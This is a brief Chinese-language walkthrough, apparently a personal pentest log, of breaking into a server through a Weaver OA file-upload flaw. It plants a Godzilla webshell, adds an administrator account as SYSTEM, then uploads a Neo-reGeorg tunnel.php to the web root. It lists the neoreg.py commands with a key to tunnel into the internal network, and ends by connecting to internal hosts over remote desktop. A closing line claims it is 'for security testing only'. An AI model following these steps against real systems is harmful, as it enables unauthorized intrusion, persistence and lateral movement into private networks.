ip:xxx.xxx.xxx.xxx
2.通过Thelostworld_OA发现此IP有泛微文件上传漏洞
3.在命令执行一栏输入命令,显示注入哥斯拉木马,利用哥斯拉进行连接,连接成功。
4.在哥斯拉命令执行栏,输入whoami显示system,具有添加账户密码与添加管理员组权限,执行且添加成功.
5.输入ipconfig,发现是内网IP,需要进行内网穿透。
6.执行Neo-reGeorg-3.8.0来搭建通信隧道。
7.执行python3 neoreg.py generate -k w2411313生成tunnel.php文件。
8.找到网站根目录,将生成的php文件进行上传搭建通信隧道,进行内网穿透。
9.访问http:x/x/x/images/logo/tunnel.php,显示空白页即为上传成功。
10.在Neo-reGeorg-3.8.0中执行python3 neoreg.py -k w2411313 -u http:x/x/x//images/logo/tunnel.php,搭建通信隧道完成。
11.通过小红帽走代理进行远程连接。
12.点击远程连接输入内网ip进行远程桌面连接。
完结
仅用于安全测试